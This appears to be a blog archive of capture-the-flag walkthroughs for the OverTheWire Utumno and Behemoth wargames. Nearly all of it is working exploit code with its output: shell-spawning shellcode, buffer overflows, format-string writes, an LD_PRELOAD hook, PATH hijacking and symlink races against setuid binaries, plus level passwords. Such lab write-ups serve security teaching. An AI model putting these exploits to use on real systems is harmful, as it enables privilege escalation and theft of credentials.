hacktracking: March 2013

# Utumno wargame: Level 4

# ssh utumno4@utumno.labs.overthewire.org
utumno4@utumno.labs.overthewire.org's password:6f6f6769656c656f6761

utumno4@melissa$ file /utumno/utumno4
/utumno/utumno4: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno4@melissa$ /utumno/utumno4 65536 `perl -e 'print "\x90"x65250 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x18 . "\xdd\xdd\xfd\xff" . "\x90"x238'`
$ /usr/bin/whoami
utumno5
$ /bin/cat /etc/utumno_pass/utumno5
776f756361656a69656b

# Utumno wargame: Level 3

# ssh utumno3@utumno.labs.overthewire.org
utumno3@utumno.labs.overthewire.org's password:7a757564616669696e65

utumno3@melissa$ file /utumno/utumno3
/utumno/utumno3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno3@melissa$ export EGG=`perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno3@melissa$ (perl -e 'print "\x2c\x77\x2e\xd9\x28\xff\x26\xff" . "\n"x9' ; cat) | /utumno/utumno3
/usr/bin/whoami
utumno4
/bin/cat /etc/utumno_pass/utumno4
6f6f6769656c656f6761

Pseudocode

a = '0'
b = '0'
[begin]
 a = getchar()
 if (a == EOF) | (b > 23) then exit()
 c = xor(a,3*b)
 d = $esp + 32 + c
 [d] = getchar()
 b = b + 1
 jump to [begin]

# Utumno wargame: Level 2

# ssh utumno2@utumno.labs.overthewire.org
utumno2@utumno.labs.overthewire.org's password:63656577616365697068

utumno2@melissa$ file /utumno/utumno2
/utumno/utumno2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno2@melissa$ mkdir /tmp/u2
utumno2@melissa$ cd !$
utumno2@melissa$ cat execve.c
#include <unistd.h>

int main(){
        char *env[11];
        env[0]=env[1]=env[2]=env[3]=env[4]=env[5]=env[6]=env[7]=env[8]="";
        env[9]="\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\xeb\x0f\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x04\xde\xff\xff\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80";
        env[10]=NULL;
        execve("/utumno/utumno2",NULL,env);
}
utumno2@melissa$ gcc -m32 -o execve execve.c && ./execve
$ /usr/bin/whoami
utumno3
$ /bin/cat /etc/utumno_pass/utumno3
7a757564616669696e65

# Utumno wargame: Level 1

# ssh utumno1@utumno.labs.overthewire.org
utumno1@utumno.labs.overthewire.org's password:61617468616579696577

utumno1@melissa$ file /utumno/utumno1
/utumno/utumno1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.24, not stripped
utumno1@melissa$ mkdir /tmp/u1
utumno1@melissa$ cd !$
utumno1@melissa$ ln -s /bin/sh mysh
utumno1@melissa$ touch `perl -e 'print "sh_\x31\xc0\x99\xb0\x0b\x52\x68\x6d\x79\x73\x68\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
utumno1@melissa$ /utumno/utumno1 /tmp/u1
$ /usr/bin/whoami
utumno2
$ /bin/cat /etc/utumno_pass/utumno2
63656577616365697068

# Utumno wargame: Level 0

# ssh utumno0@utumno.labs.overthewire.org
utumno0@utumno.labs.overthewire.org's password:7574756d6e6f30

utumno0@melissa$ file /utumno/utumno0
/utumno/utumno0: setuid executable, regular file, no read permission
utumno0@melissa$ mkdir /tmp/u0
utumno0@melissa$ cd !$
utumno0@melissa$ cat hook.c
#include <stdio.h>
#include <unistd.h>

int puts(const char *s){
        char *p;
        int i;
        write(1,"Hooked: puts function\n",22);
        printf("%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x-%x\n");
        for(i=0x80484bb-11;i<0x80484bb+11;i++){
                p=i;
                printf("%c",*p);
        }

}
utumno0@melissa$ gcc -m32 -fPIC -c hook.c -o hook.o && ld -shared -m elf_i386 -o hook.so hook.o -ldl
utumno0@melissa$ strace -s 100 -E LD_PRELOAD=./hook.so -e trace=write /utumno/utumno0
[ Process PID=11490 runs in 32 bit mode. ]
write(1, "Hooked: puts function\n", 22Hooked: puts function
) = 22
write(1, "f7fdb278-16-0-ffffd738-f7ff3f70-1-f7fdb200-ffffd7e4-f7fd0ff4-ffffd738-80483d1-80484bb\n", 86f7fdb278-16-0-ffffd738-f7ff3f70-1-f7fdb200-ffffd7e4-f7fd0ff4-ffffd738-80483d1-80484bb
) = 86
write(1, "61617468616579696577\0Read me! :P", 3261617468616579696577Read me! :P) = 32

# Behemoth wargame: Level 7

# ssh behemoth7@behemoth.labs.overthewire.org
behemoth6@behemoth.labs.overthewire.org's password:626171756f787561666f

behemoth7@melissa$ file /behemoth/behemoth7
/behemoth/behemoth7: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth7@melissa$ /behemoth/behemoth7 `perl -e 'print "A"x512 . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\xeb\x0f" . "\x90"x11 . "\x04\xd5\xff\xff". "\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80"'`
$ /usr/bin/whoami
behemoth8
$ /bin/cat /etc/behemoth_pass/behemoth8
7068656577696a374165

# Behemoth wargame: Level 6

# cat hellokitty.asm
BITS 32
xor eax,eax
mov byte al,0x74
mov byte ah,0x79
push eax
push long 0x74694b6f
push long 0x6c6c6548
mov ecx,esp
cdq
mov byte dl,0xa
xor ebx,ebx
mov byte bl,0x1
xor eax,eax
mov byte al,0x4
int 0x80
leave
ret
# nasm -f elf hellokitty.asm && ld -o hellokitty hellokitty.o
# od2sc hellokitty
"\x31\xc0\xb0\x74\xb4\x79\x50\x68\x6f\x4b\x69\x74\x68\x48\x65\x6c\x6c\x89\xe1\x99\xb2\x0a\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xc9\xc3"
# ssh behemoth6@behemoth.labs.overthewire.org
behemoth6@behemoth.labs.overthewire.org's password:6d617969726f65636865

behemoth6@melissa$ file /behemoth/behemoth6
/behemoth/behemoth6: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth6@melissa$ file /behemoth/behemoth6_reader
/behemoth/behemoth6_reader: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth6@melissa$ mkdir /tmp/b6
behemoth6@melissa$ cd !$
behemoth6@melissa$ perl -e 'print "\x31\xc0\xb0\x74\xb4\x79\x50\x68\x6f\x4b\x69\x74\x68\x48\x65\x6c\x6c\x89\xe1\x99\xb2\x0a\x31\xdb\xb3\x01\x31\xc0\xb0\x04\xcd\x80\xc9\xc3"' > shellcode.txt
behemoth6@melissa$ /behemoth/behemoth6
Correct.
$ /usr/bin/whoami
behemoth7
$ /bin/cat /etc/behemoth_pass/behemoth7
626171756f787561666f

# Behemoth wargame: Level 5

# ssh behemoth5@behemoth.labs.overthewire.org
behemoth5@behemoth.labs.overthewire.org's password:61697a65657368696e67

behemoth5@melissa$ file /behemoth/behemoth5
/behemoth/behemoth5: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth5@melissa$ ((sleep 1; /behemoth/behemoth5) & nc -4ul 1337) 2> /dev/null
6d617969726f65636865

# Behemoth wargame: Level 4

# ssh behemoth4@behemoth.labs.overthewire.org
behemoth4@behemoth.labs.overthewire.org's password:69657468656973686569

behemoth4@melissa$ file /behemoth/behemoth4
/behemoth/behemoth4: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth4@melissa$ ln -s /etc/behemoth_pass/behemoth5 /tmp/666
behemoth4@melissa$ while [ true ] ; do /behemoth/behemoth4 | grep -v "PID" ; done
Finished sleeping, fgetcing
61697a65657368696e67

# Behemoth wargame: Level 3

# ssh behemoth3@behemoth.labs.overthewire.org
behemoth3@behemoth.labs.overthewire.org's password:6e69657465696469656c

behemoth3@melissa$ file /behemoth/behemoth3
/behemoth/behemoth3: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth3@melissa$ perl -e 'print "%x."x59' | /behemoth/behemoth3
Identify yourself: Welcome, c8.f7fd3440.3.f7ffd918.0.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.2e78252e.252e7825.78252e78.f7fd002e.ffffd748.f7ea2cb5.f7feed80.804845b.f7fd2ff4.8048450.0.ffffd7c8.f7e89e37
behemoth3@melissa$ (perl -e 'print "\x5c\xd7\xff\xff" . "\x90"x4 . "\x5d\xd7\xff\xff" . "\x90"x4 . "\x5e\xd7\xff\xff" . "\x5f\xd7\xff\xff" . "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "%x"x4 . "%91x" . "%n" . "%54x" . "%n" . "%41x" . "%n" . "%n"' ; cat) | /behemoth/behemoth3
<ENTER>
Identify yourself: Welcome, \×ÿÿ]×ÿÿ^×ÿÿ_×ÿÿ1À°
                                               Rh//shh/binãRâSáÍc8f7fd34403f7ffd918                                                                                          0                                              90909090                                 90909090
/usr/bin/whoami
behemoth4
/bin/cat /etc/behemoth_pass/behemoth4
69657468656973686569

# Behemoth wargame: Level 2

# ssh behemoth2@behemoth.labs.overthewire.org
behemoth2@behemoth.labs.overthewire.org's password:65696d61687175756f66

behemoth2@melissa$ file /behemoth/behemoth2
/behemoth/behemoth2: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth2@melissa$ ltrace /behemoth/behemoth2
__libc_start_main(0x8048534, 1, -10236, 0x8048620, 0x8048680 
getpid()                                                                     = 6046
sprintf("touch 6046", "touch %d", 6046)                                      = 10
__lxstat(3, "6046", 0xffffd6d4)                                              = -1
unlink("6046")                                                               = -1
system("touch 6046"touch: cannot touch `6046': Permission denied
 <unfinished ...>
--- SIGCHLD (Child exited) ---
<... system resumed> )                                                       = 256
sleep(2000^C <unfinished ...>
--- SIGINT (Interrupt) ---
+++ killed by SIGINT +++
behemoth2@melissa$ cat > /tmp/b2/touch << eof
> /bin/sh
> eof
behemoth2@melissa$ chmod +x /tmp/b2/touch
behemoth2@melissa$ PATH=/tmp/b2:$PATH /behemoth/behemoth2
$ /usr/bin/whoami
behemoth3
$ /bin/cat /etc/behemoth_pass/behemoth3
6e69657465696469656c

# Behemoth wargame: Level 1

# ssh behemoth1@behemoth.labs.overthewire.org
behemoth1@behemoth.labs.overthewire.org's password:61657365626f6f746976

behemoth1@melissa$ file /behemoth/behemoth1
/behemoth/behemoth1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth1@melissa$ gdb -q /behemoth/behemoth1
(gdb) set disassembly-flavor intel
(gdb) disassemble main
Dump of assembler code for function main:
   0x080483f4 <+0>:     push   ebp
   0x080483f5 <+1>:     mov    ebp,esp
   0x080483f7 <+3>:     and    esp,0xfffffff0
   0x080483fa <+6>:     sub    esp,0x60
   0x080483fd <+9>:     mov    eax,0x80484f0
   0x08048402 <+14>:    mov    DWORD PTR [esp],eax
   0x08048405 <+17>:    call   0x8048320 
   0x0804840a <+22>:    lea    eax,[esp+0x1d]
   0x0804840e <+26>:    mov    DWORD PTR [esp],eax
   0x08048411 <+29>:    call   0x8048300 
   0x08048416 <+34>:    mov    DWORD PTR [esp],0x80484fc
   0x0804841d <+41>:    call   0x8048330 
   0x08048422 <+46>:    mov    eax,0x0
   0x08048427 <+51>:    leave
   0x08048428 <+52>:    ret
End of assembler dump.
(gdb) break *0x0804841d
Breakpoint 1 at 0x804841d
(gdb) run
Starting program: /behemoth/behemoth1
Password: aaa
Breakpoint 1, 0x0804841d in main ()
(gdb) print $esp+0x1d
$1 = (void *) 0xffffd6ed
(gdb) x/64xw $esp
0xffffd6d0:     0x080484fc      0x000a0000      0x00010000      0xf7fd2ff4
0xffffd6e0:     0xf7f80b19      0xf7ea2ab5      0xffffd6f8      0x61616165
0xffffd6f0:     0x00000000      0x08049600      0xffffd708      0x080482dc
0xffffd700:     0xf7fd2ff4      0x08049600      0xffffd738      0x08048449
0xffffd710:     0xf7ea2c3d      0xf7fd3324      0xf7fd2ff4      0xffffd738
0xffffd720:     0xf7ea2cb5      0xf7feed80      0x0804843b      0xf7fd2ff4
0xffffd730:     0x08048430      0x00000000      0xffffd7b8      0xf7e89e37
0xffffd740:     0x00000001      0xffffd7e4      0xffffd7ec      0xf7fdf420
0xffffd750:     0xffffffff      0xf7ffcff4      0x08048236      0x00000001
0xffffd760:     0xffffd7a0      0xf7fedd61      0xf7ffdad0      0xf7fd72e8
0xffffd770:     0x00000001      0xf7fd2ff4      0x00000000      0x00000000
0xffffd780:     0xffffd7b8      0x2dc68d1a      0x0353f50a      0x00000000
0xffffd790:     0x00000000      0x00000000      0x00000001      0x08048340
0xffffd7a0:     0x00000000      0xf7ff3f70      0xf7e89d5b      0xf7ffcff4
0xffffd7b0:     0x00000001      0x08048340      0x00000000      0x08048361
0xffffd7c0:     0x080483f4      0x00000001      0xffffd7e4      0x08048430
(gdb) print /x $ebp
$2 = 0xffffd738
(gdb) print 0xffffd73c-0xffffd6ed
$3 = 79
(gdb) quit
behemoth1@melissa$ (perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" . "\x90"x53 . "\xfd\xd6\xff\xff"' ; cat ) | /behemoth/behemoth1
ENTER
Password: Authentication failure.
Sorry.
/usr/bin/whoami
behemoth2
/bin/cat /etc/behemoth_pass/behemoth2
65696d61687175756f66
behemoth1@melissa$ ln -s /etc/behemoth_pass/behemoth2 /tmp/b2p
behemoth1@melissa$ perl -e 'print "\x31\xc0\x99\xb0\x0b\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x2f\x62\x32\x70\x68\x2f\x74\x6d\x70\x89\xe1\x52\x89\xe2\x51\x53\x89\xe1\xcd\x80" . "\x90"x39 . "\xfd\xd6\xff\xff"' | /behemoth/behemoth1
Password: Authentication failure.
Sorry.
65696d61687175756f66

# Behemoth wargame: Level 0

# ssh behemoth0@behemoth.labs.overthewire.org
behemoth0@behemoth.labs.overthewire.org's password:626568656d6f746830

behemoth0@melissa$ file /behemoth/behemoth0
/behemoth/behemoth0: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
behemoth0@melissa$ gdb -q /behemoth/behemoth0
(gdb) set disassembly-flavor intel
(gdb) break *0x080485db
Breakpoint 2 at 0x80485db
(gdb) run
Starting program: /behemoth/behemoth0
Password: aaa

Breakpoint 1, 0x080485db in main ()
(gdb) x/xw $esp
0xffffd6c0:     0xffffd6df
(gdb) x/s 0xffffd6df
0xffffd6df:      "aaa"
(gdb) x/xw $esp+0x4
0xffffd6c4:     0xffffd720
(gdb) x/s 0xffffd720
0xffffd720:      "eatmyshorts"
behemoth0@melissa$ /behemoth/behemoth0
Password: eatmyshorts
Access granted..
$ /usr/bin/whoami
behemoth1
$ /bin/cat /etc/behemoth_pass/behemoth1
61657365626f6f746976